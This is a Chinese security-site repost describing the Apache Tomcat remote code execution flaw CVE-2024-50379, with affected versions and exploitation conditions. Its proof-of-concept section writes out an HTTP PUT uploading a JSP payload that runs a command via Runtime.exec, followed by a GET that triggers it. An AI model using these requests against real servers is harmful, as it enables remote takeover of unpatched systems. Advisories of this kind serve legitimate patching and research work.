Apache Tomcat 远程代码执行漏洞(CVE-2024-50379) 利用方法/POC

admin 2024年12月18日21:51:02评论80 views字数 685阅读2分17秒阅读模式
参考:
https://lists.apache.org/thread/y6lj6q1xnp822g6ro70tn19sgtjmr80r
https://mp.weixin.qq.com/s/tsc8wsDkVj7hK12K6lrw2Q
一、漏洞介绍
Apache Tomcat 存在远程代码执行漏洞,此漏洞使得攻击者在特定情形下能够避开 Tomcat 的大小写检测机制,上传恶意文件,进而执行远程代码,最终可能致使服务器被彻底掌控,出现数据泄露状况或者服务发生中断。
二、影响版本
11.0.0-M1 <= Apache Tomcat < 11.0.2
10.1.0-M1 <= Apache Tomcat < 10.1.34
9.0.0.M1 <= Apache Tomcat < 9.0.98
三、利用条件

如果默认servlet对大小写不敏感的文件系统启用了写(readonly参数设置为非默认值false),那么在同一文件的负载下并发读取和上传可以绕过Tomcat的大小写敏感检查,并导致上传的文件被视为JSP,从而导致远程代码执行。
四、POC
并发读取和上传同一文件
PUT /test.Jsp·HTTP/1.1Content-Type:application/jsonHost:aa<%·Runtime.getRuntime().exec("calc.exe");%>
GET /test.jsp HTTP/1.1Content-Type:application/jsonHost:

原文始发于微信公众号(励行安全):新高危漏洞 (含利用方法/POC)| Apache Tomcat 远程代码执行漏洞(CVE-2024-50379)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月18日21:51:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Apache Tomcat 远程代码执行漏洞(CVE-2024-50379) 利用方法/POChttps://cn-sec.com/archives/3524082.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息